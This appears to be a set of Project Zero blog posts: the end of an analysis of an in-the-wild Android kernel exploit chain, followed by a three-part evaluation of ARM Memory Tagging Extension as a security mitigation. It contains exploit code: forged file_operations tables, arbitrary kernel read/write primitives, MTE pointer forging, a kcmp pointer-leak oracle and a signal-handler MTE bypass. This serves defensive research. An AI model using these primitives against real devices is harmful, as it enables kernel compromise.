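// Returns non-zero once the arbitrary write has landed in init_uts_ns: the
// version string reported by uname(2) then differs from the real one.
static int kernel_write_landed(void) {
  struct utsname un;
  if (uname(&un) != 0)
    return 0;
  return memcmp(un.version, "MARK", 4) == 0;  // "MARK" is a placeholder
}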


Once their fake file_operations table is forged, they use their arbitrary write once more to place a pointer to this table inside of the ashmem_misc structure. This forged file_operations struct varies from device to device, but on the Samsung S10 it looks like so:


static const struct file_operations ashmem_fops = {
    .open = ashmem_open,
    .release = ashmem_release,
    .read = configfs_read_file,
    .write = configfs_write_file,
    .llseek = default_llseek,
    .mmap = ashmem_mmap,
    .unlocked_ioctl = ashmem_ioctl,
#ifdef CONFIG_COMPAT
    .compat_ioctl = compat_ashmem_ioctl,
#endif
};


Note that the VFS read/write operations have been changed to point to configfs handlers instead. The combination of configfs file ops with ashmem file ops leads to an attacker-induced type-confusion on the private_data object in the struct file. Analysis of those handlers reveals simple-to-reach copy_[to/from]_user calls with the kernel pointer populated from the struct file's private_data backing store:


static int
fill_write_buffer(struct configfs_buffer * buffer, const char __user * buf, size_t count)
{
    ...
    if (count >= SIMPLE_ATTR_SIZE)
        count = SIMPLE_ATTR_SIZE - 1;
    error = copy_from_user(buffer->page, buf, count);
    buffer->needs_read_fill = 1;
    buffer->page[count] = 0;
    return error ? -EFAULT : count;
}
...
static ssize_t
configfs_write_file(struct file *file, const char __user *buf, size_t count, loff_t *ppos)
{
    struct configfs_buffer * buffer = file->private_data;
    ssize_t len;

    mutex_lock(&buffer->mutex);
    len = fill_write_buffer(buffer, buf, count);
    if (len > 0)
        len = flush_write_buffer(file->f_path.dentry, buffer, len);
    if (len > 0)
        *ppos += len;
    mutex_unlock(&buffer->mutex);
    return len;
}

The private_data backing store itself can be subsequently modified by an attacker using the ashmem ioctl command ASHMEM_SET_NAME in order to change the kernel pointer used for the arbitrary read and write primitives. The final arbitrary write primitive (for example) looks like this:


int arb_write(unsigned long dst, const void *src, size_t size)

{

  __int64 page_offset; // x8

  __int128 v5; // q0

  __int64 neg_idx; // x24

  void *data_to_write; // x21

  char tmp_name_buffer[256]; // [xsp+0h] [xbp-260h] BYREF

  char name_buffer[256]; // [xsp+100h] [xbp-160h] BYREF

  char v13; // [xsp+200h] [xbp-60h]

  ...

  memset(tmp_name_buffer, 0, sizeof(tmp_name_buffer));

  page_offset = *(_QWORD *)(*(_QWORD *)(qword_898840 + 24) + 1056LL);

  if ( (page_offset & 0x8000000000000000LL) == 0 )

  {

    while ( 1 )

      ;

  }

  //dst is the kernel address we will write to

  *(_QWORD *)&tmp_name_buffer[(int)page_offset] = dst;

  neg_idx = 0;

  memset(name_buffer,'C',sizeof(name_buffer));

  //They have to do this backwards while loop so they can write

  //nulls into the name buffer

  while (1)

  {

    name_buffer[neg_idx + 244] = tmp_name_buffer[neg_idx + 255];

    if ( ioctl(ashmem_fd, ASHMEM_SET_NAME, name_buffer) < 0 )

      break;

    if ( --neg_idx == -245 )

    {

    //At this point, the ->page used in configfs_write_file will

    //be set due to the ASHMEM_SET_NAME calls

      if ( lseek(ashmem_fd, 0LL, 0) >= 0 )

      {

        data_to_write = (void *)(mmap_page - size + 4096);

        memcpy(data_to_write, src, size);

  //This will EFAULT due to intentional misalignment on the

  //page so as to ensure copying the right number of bytes

        write(ashmem_fd, data_to_write, size + 1);

        return 0;

      }

      return -1;

    }

  }

  return -1;

}


The arbitrary read primitive is nearly identical to the arbitrary write primitive code, but instead of using write(2), they use read(2) from the ashmem_fd instead to read data from the kernel into userland.
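For completeness, the read side plausibly looks like the following sketch under the same assumptions as the arb_write pseudocode above; set_configfs_page() is a hypothetical helper standing in for the backwards ASHMEM_SET_NAME loop that plants the target kernel address as buffer->page:

#include <unistd.h>

extern int ashmem_fd;
extern int set_configfs_page(unsigned long kaddr);  // hypothetical helper

// Read `size` bytes of kernel memory at `src` into `dst` via the replaced
// configfs_read_file handler.
static int arb_read(unsigned long src, void *dst, size_t size) {
  if (set_configfs_page(src) < 0)
    return -1;
  if (lseek(ashmem_fd, 0, SEEK_SET) < 0)
    return -1;
  return read(ashmem_fd, dst, size) == (ssize_t)size ? 0 : -1;
}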


Conclusion

This exploit chain provides a real-world example of what we believe modern in-the-wild Android exploitation looks like. An early contextual theme from the initial stages of this exploit chain (not described in detail in this post) is the reliance on n-days to bypass the hardest security boundaries. Reliance on patch backporting by downstream vendors leads to a fragile ecosystem where a single missed bugfix can lead to high-impact vulnerabilities on end-user devices. The retention of these vulnerabilities in downstream codebases counteracts the efforts that the security research and broader development community invest in discovering bugs and developing patches for widely used software. It would greatly improve the security of those end-users if vendors strongly considered efficient methods that result in faster and more reliable patch-propagation to downstream devices.


It is also particularly noteworthy that this attacker created an exploit chain using multiple bugs from kernel GPU drivers. These third-party Android drivers have varying degrees of code quality and regularity of maintenance, and this represents a notable opportunity for attackers. We also see the risk that the Linux kernel 32-bit compatibility layer presents, particularly when it requires the same patch to be re-implemented in multiple places. This requirement makes patching even more complex and error-prone, so vendors and kernel code-writers must continue to remain vigilant to ensure that the 32-bit compatibility layer presents as few security issues as possible in the future.


Update October 6th 2023: This post was edited to reflect the fact that CVE-2022-4262 was a Chrome 0-day at the time this chain was discovered, not an n-day as previously stated.


MTE As Implemented, Part 3: The Kernel

2 August 2023 at 16:30

By Mark Brand, Project Zero

Background

In 2018, in the v8.5a version of the ARM architecture, ARM proposed a hardware implementation of tagged memory, referred to as MTE (Memory Tagging Extensions).

In Part 1 we discussed testing the technical (and implementation) limitations of MTE on the hardware that we've had access to. In Part 2 we discussed the implications of this for mitigations built using MTE in various user-mode contexts. This post will now consider the implications of what we know on the effectiveness of MTE-based mitigations in the kernel context.

To recap - there are two key classes of bypass techniques for memory-tagging based mitigations, and these are the following:

  1. Known-tag-bypasses - In general, confidentiality of tag values is key to the effectiveness of memory-tagging as a mitigation. A breach of tag confidentiality allows the attacker to directly or indirectly ensure that their invalid memory accesses will be correctly tagged, and therefore not detectable.
  2. Unknown-tag-bypasses - Implementation limits might mean that there are opportunities for an attacker to still exploit a vulnerability despite performing memory accesses with incorrect tags that could be detected.

There are two main modes for MTE enforcement:

  1. Synchronous (sync-MTE) - tag check failures result in a hardware fault on instruction retirement. This means that the results of invalid reads and the effects of invalid writes should not be architecturally observable.
  2. Asynchronous (async-MTE) - tag check failures do not directly result in a fault. The results of invalid reads and the effects of invalid writes are architecturally observable, and the failure is delivered at some point after the faulting instruction in the form of a per-cpu flag.

Since Spectre, it has been clear that using standard memory-tagging approaches as a "hard probabilistic mitigation"1 is not generally possible - in any context where an attacker can construct a speculative side-channel, known-tag-bypasses are a fundamental weakness that must be accounted for.

Kernel-specific problems

There are a number of additional factors which make robust mitigation design using MTE more problematic in the kernel context.

From a stability perspective, it might be considered problematic to enforce a panic on kernel-tag-check-failure detection - we believe that this would be essential for any mitigation based on async (or asymmetric) MTE modes.

Here are some problems that we think will be difficult to address systematically:

  1. Similar to the Chrome renderer scenario discussed in Part 2, we expect there to be continued problems in guaranteeing confidentiality of kernel memory in the presence of CPU speculative side-channels.

    This fundamentally limits the effectiveness of an MTE-based mitigation in the kernel against a local attacker, making known-tag-bypasses highly likely.
  2. TCR_ELx.TCMA1 is required in the current kernel implementation. This means that any pointer with the tag 0b1111 can be dereferenced without enforcing tag checks. This is necessary for various reasons - there are many places in the kernel where, for example, we need to produce a dereferenceable pointer from a physical address, or an offset in a struct page.

    This makes it possible for an attacker to reliably forge pointers to any address, which is a significant advantage during exploitation (a short illustration follows this list).
  3. [ASYNC-only] Direct access to the Tag Fault Status Register TFSR_EL1 is likely necessary. If so, the kernel is capable of clearing the tag-check-failure flags for itself; this is a weakness that will likely form part of the simplest unknown-tag-bypass exploits. This weakness does not exist in user-space, as it is necessary to transition into kernel-mode to clear the tag-check-failure bits, and the transition into kernel-mode should detect the async tag-check-failure and dispatch an error appropriately.
  4. DMA - typically multiple devices on the system have DMA access to various areas of physical memory, and in the cases of complex devices such as GPUs or hardware accelerators, this includes dynamically mapping parts of normal user space or kernel space memory.

    This can pose multiple problems - any code that sets up device mappings is already critical to security, but this is also potentially of use to an attacker in constructing powerful primitives (after the "first invalid access").
  5. DMA from non-MTE enabled cores on the system - we've already seen in-the-wild attackers start to use coprocessor vulnerabilities to bypass kernel mitigations, and if those coprocessors have a lower level of general software mitigations in place we can expect to see this continue.

    This alone isn't a reason not to use MTE in kernels - it's just something that we should bear in mind, especially when considering the security implications of moving additional code to coprocessors.
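As referenced in 2. above, forging such a match-all pointer is trivial once an attacker controls a pointer-sized value, since the logical tag lives in bits 59:56 of the virtual address:

#include <stdint.h>

// Set the logical tag of an address to 0b1111; with TCR_ELx.TCMA1 set, a
// dereference through this pointer skips tag checking entirely.
static uint64_t forge_match_all(uint64_t addr) {
  return addr | (0xFULL << 56);
}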

Additionally, there are problems that limit coverage (due to current implementation details in the linux kernel):

  1. The kcmp syscall is problematic for confidentiality of kernel pointers, as it allows user-space to compare two struct file* pointers for equality (a minimal illustration follows below). Other system calls have similar implementation details that allow user-space to leak information about equality of kernel pointers (fuse_lock_owner_id).
  2. Similarly to the above issue, several kernel data structures use pointers as keys, which has also been used to leak information about kernel pointers to user-space. (See here, search for epoll_fdinfo).

    This is an issue for user-space use of MTE as well, especially in the context of eg. a browser renderer process, but highlighting here that there are known instances of this pattern in the linux kernel that have already been used publicly.

  3. TYPESAFE_BY_RCU regions require/allow use-after-free access by design, so allocations in these regions could not currently be protected by memory-tagging. (See this thread for some discussion.)
  4. In addition to skipping specific tag-check-failures (as per 3 in the earlier list), it may also be currently possible for an attacker to disable kasan using a single memory write. This would also be a single point of failure that would need to be avoided.
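As a minimal illustration of the kcmp comparison oracle mentioned in 1. above (kcmp returns 0 when both file descriptors refer to the same struct file):

#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

#define KCMP_FILE 0  /* from linux/kcmp.h */

// Leak equality of two kernel struct file* pointers without reading them.
static int same_struct_file(pid_t pid, int fd1, int fd2) {
  return syscall(SYS_kcmp, pid, pid, KCMP_FILE, fd1, fd2) == 0;
}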

[1] A hard mitigation that does not provide deterministic protection, but which can be universally bypassed by the attacker "winning" a probabilistic condition, in the case of MTE (with 4 tag bits available, likely with one value reserved) this would probably imply a 1/15 chance of success.

MTE As Implemented, Part 2: Mitigation Case Studies

2 August 2023 at 16:30

By Mark Brand, Project Zero

Background

In 2018, in the v8.5a version of the ARM architecture, ARM proposed a hardware implementation of tagged memory, referred to as MTE (Memory Tagging Extensions).

In Part 1 we discussed testing the technical (and implementation) limitations of MTE on the hardware that we've had access to. This post will now consider the implications of what we know on the effectiveness of MTE-based mitigations in several important products/contexts.

To summarize - there are two key classes of bypass techniques for memory-tagging based mitigations, and these are the following (for some examples, see Part 1):

  1. Known-tag-bypasses - In general, confidentiality of tag values is key to the effectiveness of memory-tagging as a mitigation. A breach of tag confidentiality allows the attacker to directly or indirectly ensure that their invalid memory accesses will be correctly tagged, and are therefore not detectable.
  2. Unknown-tag-bypasses - Implementation limits might mean that there are opportunities for an attacker to still exploit a vulnerability despite performing memory accesses with incorrect tags that could be detected.

There are two main modes for MTE enforcement:

  1. Synchronous (sync-MTE) - tag check failures result in a hardware fault on instruction retirement. This means that the results of invalid reads and the effects of invalid writes should not be architecturally observable.
  2. Asynchronous (async-MTE) - tag check failures do not directly result in a fault. The results of invalid reads and the effects of invalid writes are architecturally observable, and the failure is delivered at some point after the faulting instruction in the form of a per-cpu flag.

Since Spectre, it has been clear that using standard memory-tagging approaches as a "hard probabilistic mitigation"1 is not generally possible. In any context where an attacker can construct a speculative side-channel, known-tag-bypasses are a fundamental weakness that must be accounted for.

Another proposed approach is combining MTE with another software approach to construct a "hard deterministic mitigation"2. The primary example of this would be the *Scan+MTE combinations proposed in Chrome to mitigate use-after-free vulnerabilities by ensuring that a tag is not re-used for an allocation while there are any stale pointers pointing to that allocation.

In this case, is async-MTE sufficient as an effective mitigation? We have demonstrated techniques that allow an unknown-tag-bypass when using async-MTE, so it seems clear that for a "hard" mitigation, (at least) sync-MTE will be necessary. This should not, however, be interpreted as implying that such a "soft" mitigation would not prove a significant inconvenience to attackers - we're going to discuss that in detail below.

How much would MTE hurt attackers?

In order to understand the "additional difficulty" that attackers will face in writing exploits that can bypass MTE-based mitigations, we need to carefully consider the context in which the attacker finds themselves.

We have assumed here that the target reliability a high-tier attacker would want is around 95% - this is likely lower than currently expected in most cases, but probably higher than the absolute limit at which an exploit might become too unreliable for their operational needs. We also note that in some contexts an attacker might be able to use even an extremely unreliable exploit without significantly increasing their risk of detection. While we'd expect attackers to desire (and invest in) achieving reliability, it's unlikely that forcing an upper bound on that reliability, even if we could, would be enough to completely prevent exploitation.

However, any such drop in reliability should generally be expected to increase detection of in-the-wild usage of exploits, increasing the risk to attackers accordingly.

An additional note is that most unknown-tag-bypasses would be prevented by the use of sync-MTE, at least in the absence of specific weaknesses in the application which would over time likely be fixed as exploits are observed exploiting those weaknesses.

We consider 4 main contexts here, as we believe these are the most relevant/likely use-cases for a usermode mitigation:

| Context | Mode | known-tag-bypass | unknown-tag-bypass |
| --- | --- | --- | --- |
| Chrome: Renderer Exploit | async | Trivial ♻️ | Likely trivial ♻️ |
| Chrome: Renderer Exploit | sync | Trivial ♻️ | Bypass techniques should be rare 🛠️ |
| Chrome: IPC Sandbox Escape | async | Likely possible in many cases ♻️ | Likely possible in many cases 🐛* |
| Chrome: IPC Sandbox Escape | sync | Likely possible in many cases ♻️ | Bypass techniques should be rare 🛠️ |
| Android: Binder Sandbox Escape | async | Difficulty will depend on service | Difficulty will depend on service 🐛* |
| Android: Binder Sandbox Escape | sync | Difficulty will depend on service | Bypass techniques should be rare 🛠️ |
| Android: Messaging App Oneshot | async | Likely impossible in most cases | Good enough bugs will be very rare 🐛* |
| Android: Messaging App Oneshot | sync | Likely impossible in most cases | Bypass techniques should be rare 🛠️ |

The degree of pain for attackers caused by needing to bypass MTE is roughly assessed from low to very high.

♻️: Once developed, generic bypass technique can likely be shared between exploits.

🛠️: Limited supply of bypass techniques that could be fixed, eventually eliminating this bypass.

🐛: Additional constraints imposed by bypass techniques mean that the subset of issues that are exploitable is significantly reduced with MTE.

* Note that it's also potentially possible to design software to make exploitation of these unknown-tag-bypass techniques more restrictive by eg. inserting system calls in specific choke-points. We haven't investigated the practicality or limitations of such an approach at this time, but it is unlikely to be generally applicable especially where third-party code is involved.

Chrome: Javascript -> Compromised Renderer

Spectre-type speculative side-channels can be used to break tag confidentiality, so known-tag-bypasses are a certainty.

For unknown-tag-bypasses, javascript should in most situations be able to avoid system calls for the duration of the exploit, so the exploit needs to complete within the soft time constraint.

It's likely that both known-tag-bypass and unknown-tag-bypass techniques can be made generic and reused across multiple different vulnerabilities.

Chrome: Compromised Renderer -> Mojo IPC Sandbox Escape

It is likely that Spectre-type speculative side-channels can be used to break tag confidentiality, so known-tag-bypasses are a possibility.

For unknown-tag-bypasses, we believe that there are circumstances under which multiple IPC messages can be processed without a system call in between. This does not hold for all situations, and the current public state-of-the-art techniques for Browser process IPC exploitation would perform multiple system calls and would not be suitable.

It's possible that a generic speculative-side-channel attack could be developed that would allow reuse of techniques for known-tag-bypasses against a specific privileged process (likely the Browser process). Any unknown-tag-bypass exploit would likely require additional per-bug cost to develop due to the additional complexity required in avoiding system calls for the duration of the exploit.

Android: App -> Binder IPC Sandbox Escape

It is likely that Spectre-type speculative side-channels can be used to break tag confidentiality, so known-tag-bypasses are a possibility.


For unknown-tag-bypasses, we note that there is a mandatory system call ioctl(..., BINDER_WRITE_READ, ...) between different IPC messages. This implies that an exploit would need to complete within the execution of the triggering IPC message in addition to meeting the soft time constraint.

As there are a large number of different Binder IPC services hosted in different processes, a known-tag-bypass technique is less likely to be reusable between different vulnerabilities. The exploitation of unknown-tag-bypasses is unlikely to be reusable, and will require specific per-vulnerability development.

An additional note - at present, .data section pointers are not tagged, so the zygote architecture means that pointer-forging between some contexts would be easy for an attacker, which could be a useful technique for exploiting some vulnerabilities leading to second-order memory corruption (eg. type confusion allowing an attacker to treat data as a pointer).

Android: Remote -> Messaging App

It is unlikely that Spectre-type speculative side-channels can be used to break tag confidentiality, so known-tag-bypasses are highly unlikely, unless the application allows alternative side channels (or eg. repeated exploitation attempts until the tag is correct).


For unknown-tag-bypasses, attackers will need a very good one-shot bug, likely in complex file-format parsing. An exploit would still need to meet the soft time constraint.

It's likely that exploitation techniques here will be bespoke and both per-application and per-vulnerability, even if there is significant shared code between different messaging applications.


Part 3 continues this series with a more detailed discussion of the specifics of applying MTE to the kernel, which has some additional nuance (and may still contain some information of interest even if you're only interested in user-space applications). 

[1] A hard mitigation that does not provide deterministic protection, but which can be universally bypassed by the attacker "winning" a probabilistic condition, in the case of MTE (with 4 tag bits available, likely with one value reserved) this would probably imply a 1/15 chance of success.

[2] A hard mitigation that does provide deterministic protection.

MTE As Implemented, Part 1: Implementation Testing

2 August 2023 at 16:30

By Mark Brand, Project Zero

Background

In 2018, in the v8.5a version of the ARM architecture, ARM proposed a hardware implementation of tagged memory, referred to as MTE (Memory Tagging Extensions).

Through mid-2022 and early 2023, Project Zero had access to pre-production hardware implementing this instruction set extension to evaluate the security properties of the implementation. In particular, we're interested in whether it's possible to use this instruction set extension to implement effective security mitigations, or whether its use is limited to debugging/fault detection purposes.

As of the v8.5a specification, MTE can operate in two distinct modes, which are switched between on a per-thread basis. The first mode is sync-MTE, where tag-check failure on a memory access will cause the instruction performing the access to deliver a fault at retirement. The second mode is async-MTE, where tag-check failure does not directly (at the architectural level) cause a fault. Instead, tag-check failure will cause the setting of a per-core flag, which can then be polled from the kernel context to detect when an invalid access has occurred.

This blog post documents the tests that we have performed so far, and the conclusions that we've drawn from them, together with the code necessary to repeat these tests. This testing was intended to explore both the details of the hardware implementation of MTE, and the current state of the software support for MTE in the Linux kernel. All of the testing is based on manually implemented tagging in statically-linked standalone binaries, so it should be easy to reproduce these results on any compatible hardware.

Terminology

When designing and implementing security features, it's important to be conscious of the specific protection goal. In order to provide clarity in the rest of this post, we'll define some specific terminology that we use when talking about this:

  1. Mitigation - A mitigation is something that reduces real exploitability of a vulnerability or class of vulnerability. The expectation is that attackers can (and eventually will) find their way around it. Examples would be DEP, ASLR, CFI.
  1. "Soft" Mitigation - We consider a mitigation to be "soft" if the expectation is that an attacker pays a one-time cost in order to bypass the mitigation. Typically this would be a per-target cost, for example developing a ROP chain to bypass DEP, which can usually be largely re-used between different exploits for the same target software.
  2. "Hard" Mitigation - We consider a mitigation to be "hard" if the expectation is that an attacker cannot develop a bypass technique which is reusable between different vulnerabilities (without, e.g. incorporating an additional vulnerability). An example would be ASLR, which is typically bypassed either by the use of a separate information leak vulnerability, or by developing an information leak primitive using the same vulnerability.

Note that the context can have an impact on the "hardness" of a mitigation - if a codebase is particularly rich in code-patterns which allow the construction of information leaks, it's quite possible that an attacker can develop a reliable, reusable technique for turning various memory corruption primitives into an information leak within that codebase.

  2. Solution - a solution is something that eliminates exploitability of a vulnerability or class of vulnerability. The expectation is that the only way for an attacker to bypass a solution would be an unintended implementation weakness in the solution.

For example (based purely on a theoretical implementation of memory tagging):

 - Randomly-allocating tags to heap allocations cannot be considered a solution for any class of heap-related memory corruption, since this provides at best probabilistic protection.

 - Allocating odd and even tags to adjacent heap allocations might theoretically be able to provide a solution for linear heap-buffer overflows.

Hardware Implementation

The main hardware implementation question we had was, does a speculative side-channel exist that would allow leaking whether or not a tag-check has succeeded, without needing to architecturally execute the tag-check?

It is expected that Spectre-type speculative execution side-channels will still allow an attacker to leak pointer values from memory, indirectly leaking the tags. Here we consider whether the implementation introduces additional speculative side-channels that would allow an attacker to more efficiently leak tag-check success/failure.

TL;DR: In our testing we did not identify an additional1 speculative side-channel that would allow such an attack to be performed.

1. Does MTE block Spectre? (NO)

The only way that MTE could prevent exploitation of Spectre-type weaknesses would be to have speculative execution stall the pipeline until the tag-check completes2. This might sound desirable ("prevent exploitation of Spectre-type weaknesses") but it's not - this would create a much stronger side-channel to allow an attacker to create an oracle for tag-check success, weakening the overall security properties of the MTE implementation.

This is easy to test. If we can still leak data out of speculative execution using Spectre when the pointer used for the speculative access has an incorrect tag, then this is not the case.

We wrote a small patch to the safeside demo spectre_v1_pht_sa that demonstrates this:

mte_device:/data/local/tmp $ ./spectre_v1_pht_sa_mte

Leaking the string: 1t's a s3kr3t!!!

Done!

Checking that we would crash during architectural access:

Segmentation fault

2. Does tag-check success/failure have a measurable impact on the speculation window length? (Probably NOT)

There is a deeper question that we'd like to understand: is the length of speculative execution after a memory access influenced by whether the tag-check for that access succeeds or fails? If this was the case, then we might be able to build a more complex speculative side-channel that we could use in a similar way.

In order to measure this, we need to force a mis-speculation, and then perform a read access to memory for which a tag-check would either succeed or fail, and then we need to use a speculative side-channel to measure how many further instructions were successfully speculatively executed. We wrote and tested a self-contained harness to measure this, which can be found in speculation_window.c.

This harness works by generating code for a test function with a variable number of no-op instructions at runtime, and then repeatedly executing this test function in a loop to train the branch-predictor before finally triggering mis-speculation. The test function is as follows:

  ldr  x0, [x0]         ; this load is slow (*x0 is uncached)

  cbnz x0, speculation  ; this branch is always taken during warmup

  ret

speculation:

  ldr  x1, [x1]         ; this load is fast (*x1 is cached)

                        ; the tag-check success or fail will happen on

                        ; this access, but during warmup the tag-check

                        ; will always be a success.

  orr  x2, x2, x1       ; this is a no-op (as x1 is always 0) but it

  ... n times ...       ; maintains a data dependency between the

  orr  x2, x2, x1       ; loads (and the no-ops), hopefully preventing

                        ; too much re-ordering.

  ldr  x2, [x2]         ; *x2 is uncached, if it is cached later then

                        ; this instruction was (probably) executed.

  ret


In this way we can measure the number of no-ops that we can insert before the final load no longer executes (ie. the result from the first load is received and we realise that we've mispredicted the branch so we flush the pipeline before the final load is executed).

In order to reduce bias due to branch-predictor behaviour, the test program is run separately for the tag-check success and tag-check failure case, and the control-flow being run is identical in both cases.

In order to reduce bias due to cpu power-management/throttling behaviour, each time the test program is run, it collects a single set of samples and then exits. We then run this program repeatedly, and by interleaving the runs for tag-check success and tag-check fail we look to reduce this influence on the results. In addition, the cores are down-clocked to the lowest supported frequency using the standard linux cpu scaling interface, which should reduce the impact of cpu throttling to a minimum.

Most modern mobile devices also have non-homogenous core designs, with for example a 4+4, 2+2+4 or 1+3+4 core design. Since the device under test is no exception, the program needs to pin itself to a specific core and we need to run these tests for each core design separately.

Reading from the virtual timer is extremely slow (relative to memory access instructions), and this results in noisy data when attempting to measure single-cache-hit/single-cache-miss. In a normal real-world environment, a shared-memory timer is often a better approach to timing with this level of granularity, and that's an approach that we've used previously with success. In this case, since we want to get data for each core, it was difficult to get consistency across all cores, and we had better results using an amplification approach performing accesses to multiple cache-lines.

However, this approach adds more complexity to the measuring code, and more possibilities for smart prefetching or similar to interfere with our measurements. Since we are trying to test the properties of the hardware, rather than develop a practical attack that needs to run in a timely fashion, we decided to minimise these risks and instead collect enough data that we'd be able to see the patterns through the noise.

The first graphs below show this data for a region of the x-axis (nop-count) on each core around where the speculation window ends (so the x-axis is anchored differently for each core), and on the y-axis we plot the observed probability that our measurement results in a cache-miss. Two separate lines are plotted in each graph; one in red for the "tag-check-fail" case and one in green for the "tag-check-pass" case. We can't really see the green line at all - the two lines overlap so closely as to be indistinguishable.

If we really zoom in on measurements from the "Biggest" core, we can see the two lines deviating due to the noise:


Another interesting point to notice is that the graph we have for the biggest core tops out at a probability of ~30%; this is (probably) not because we're hitting the cache, but instead because the timer read is so slow that we can't use it to reliably differentiate between cache misses and cache hits most of the time. If we look at a graph of raw latency measurements, we can see this:

The important thing is that there's no significant difference between the results for the failure and success cases, which suggests that there's no clear speculative side-channel that would allow an attacker to build a side-channel tag-check oracle directly.

Software Implementation

There are several ways that we identified that the current software implementation around the use of MTE could lead to bypasses if MTE were used as a security mitigation.

As described below, Issues 1 and 2 are quirks of the current implementation that it may or may not be possible to address with kernel changes. They are both of limited scope and only apply to very specific conditions, so they likely don't have a particularly significant impact on the applicability of MTE as a security mitigation (although they have some implications for the coverage of such a mitigation).

Issue 3 is a detail of the current implementation of Breakpad, and serves to highlight a particular class of weakness that will require careful audit of signal handling code in any application that wishes to use MTE as a security mitigation.

Issue 4 is a fundamental weakness that likely cannot be effectively addressed. We would not characterize this as meaning that MTE could not be applied as a security mitigation, but rather as a limitation on the claims that one could make about the effectiveness of such a mitigation.

To be more specific, both issues 3 and 4 are bound by some fairly significant limitations, which would have varying impact on exploitability of memory corruption issues depending on the specific context in which the issue occurs. See below for more discussion on this topic.

TL;DR: In our testing we identified some areas for improvement on the software side, and demonstrated that it is possible to use the narrow "exploitation window" to avoid the side-effects of tag-check failures under some circumstances, meaning that any mitigation based on async MTE is likely limited to a "soft mitigation" regardless of tagging strategy.

1. Handling of system call arguments [ASYNC]

There's a documented limitation of the current handling of the async MTE check mode in the linux kernel, which is that the kernel does not catch invalid accesses to userspace pointers. This means that kernel-space accesses to incorrectly tagged user-space pointers during a system call will not be detected.

There are likely good technical reasons for this limitation, but we plan to investigate improving this coverage in the future.

We provide a sample that demonstrates this limitation, software_issue_1.c.

mte_enable(false, DEFAULT_TAG_MASK);

uint64_t* ptr = mmap(NULL, 0x1000,

  PROT_READ|PROT_WRITE|PROT_MTE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);

uint64_t* tagged_ptr = mte_tag_and_zero(ptr, 0x1000);

memset(tagged_ptr, 0x23, 0x1000);

int fd = open("/dev/urandom", O_RDONLY);

fprintf(stderr, "%p %p\n", ptr, tagged_ptr);

read(fd, ptr, 0x1000);

assert(*tagged_ptr == 0x2323232323232323ull);

taro:/ $ /data/local/tmp/software_issue_1                                                                                                                  

0x7722c5d000 0x800007722c5d000

software_issue_1: ./software_issue_1.c:46: int main(int, char **): Assertion `*tagged_ptr == 0x2323232323232323ull' failed.

2. Handling of system call arguments [SYNC]

The way that the sync MTE check mode is currently implemented in the linux kernel means that kernel-space accesses to incorrectly tagged user-space pointers result in the system call returning EFAULT. While this is probably the cleanest and simplest approach, and is consistent with current kernel behaviour especially when it comes to handling results for partial operations, this has the potential to lead to bypasses/oracles in some circumstances.

We plan to investigate replacing this behaviour with SIGSEGV delivery instead (specifically for MTE tag check failures).

The provided sample, software_issue_2.c is a very simple demonstration of this situation.

size_t readn(int fd, void* ptr, size_t len) {

  char* start_ptr = ptr;

  char* read_ptr = ptr;

  while (read_ptr < start_ptr + len) {

    ssize_t result = read(fd, read_ptr, start_ptr + len - read_ptr);

    if (result <= 0) {

      return read_ptr - start_ptr;

    } else {

      read_ptr += result;

    }

  }

  return len;

}

int main(int argc, char** argv) {

  int pipefd[2];

  mte_enable(true, DEFAULT_TAG_MASK);

  uint64_t* ptr = mmap(NULL, 0x1000,

    PROT_READ|PROT_WRITE|PROT_MTE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);

  ptr = mte_tag(ptr, 0x10);

  strcpy(ptr, "AAAAAAAAAAAAAAA");

  assert(!pipe(pipefd));

  write(pipefd[1], "BBBBBBBBBBBBBBB", 0x10);

  // In sync MTE mode, kernel MTE tag-check failures cause system calls to fail

  // with EFAULT rather than triggering a SIGSEGV. Existing code doesn't

  // generally expect to receive EFAULT, and is very unlikely to handle it as a

  // critical error.

  uint64_t* new_ptr = ptr;

  while (!strcmp(new_ptr, "AAAAAAAAAAAAAAA")) {

    // Simulate a use-after-free, where new_ptr is repeatedly free'd and ptr

    // is accessed after the free via a syscall.

    new_ptr = mte_tag(new_ptr, 0x10);

    strcpy(new_ptr, "AAAAAAAAAAAAAAA");

    size_t bytes_read = readn(pipefd[0], ptr, 0x10);

    fprintf(stderr, "read %zu bytes\nnew_ptr string is %s\n", bytes_read, new_ptr);

  }

}

taro:/ $ /data/local/tmp/software_issue_2                                                                                                          

read 0 bytes

new_ptr string is AAAAAAAAAAAAAAA

read 0 bytes

new_ptr string is AAAAAAAAAAAAAAA

read 0 bytes

new_ptr string is AAAAAAAAAAAAAAA

read 0 bytes

new_ptr string is AAAAAAAAAAAAAAA

read 0 bytes

new_ptr string is AAAAAAAAAAAAAAA

read 0 bytes

new_ptr string is AAAAAAAAAAAAAAA

read 0 bytes

new_ptr string is AAAAAAAAAAAAAAA

read 16 bytes

new_ptr string is BBBBBBBBBBBBBBB

3. New dangers in signal handlers [ASYNC].

Since SIGSEGV is a catchable signal, any signal handler that can handle SIGSEGV becomes a critical attack surface for async MTE bypasses. Breakpad/Crashpad at present install a signal handler (in all Chrome processes) which allows a trivial same-thread bypass of async MTE as a security protection, demonstrated in async_bypass_signal_handler.c / async_bypass_signal_handler.js.

The concept is simple - if we can corrupt any state that would result in the signal handler concluding that a SIGSEGV coming from a tag-check failure is handled/safe, then we can effectively disable MTE for the process.

If we look at the current breakpad signal handler (the crashpad signal handler has the same design):

void ExceptionHandler::SignalHandler(int sig, siginfo_t* info, void* uc) {

  // Give the first chance handler a chance to recover from this signal

  //

  // This is primarily used by V8. V8 uses guard regions to guarantee memory

  // safety in WebAssembly. This means some signals might be expected if they

  // originate from Wasm code while accessing the guard region. We give V8 the

  // chance to handle and recover from these signals first.

  if (g_first_chance_handler_ != nullptr &&

      g_first_chance_handler_(sig, info, uc)) {

    return;

  }

It's clear that if our exploit could patch g_first_chance_handler_ to point to any function that will return a non-zero value, then this will mean that tag-check failures are no longer caught.

The example we've provided in async_bypass_signal_handler.c and async_bypass_signal_handler.js demonstrates an exploit using this technique against a simulated bug in the duktape javascript interpreter.

taro:/data/local/tmp $ ./async_bypass_signal_handler ./async_bypass_signal_handler.js

offsets: 0x26c068 0x36bc80

starting script execution

access

segv handler 11

Async MTE has been bypassed [0.075927734375ms]

done

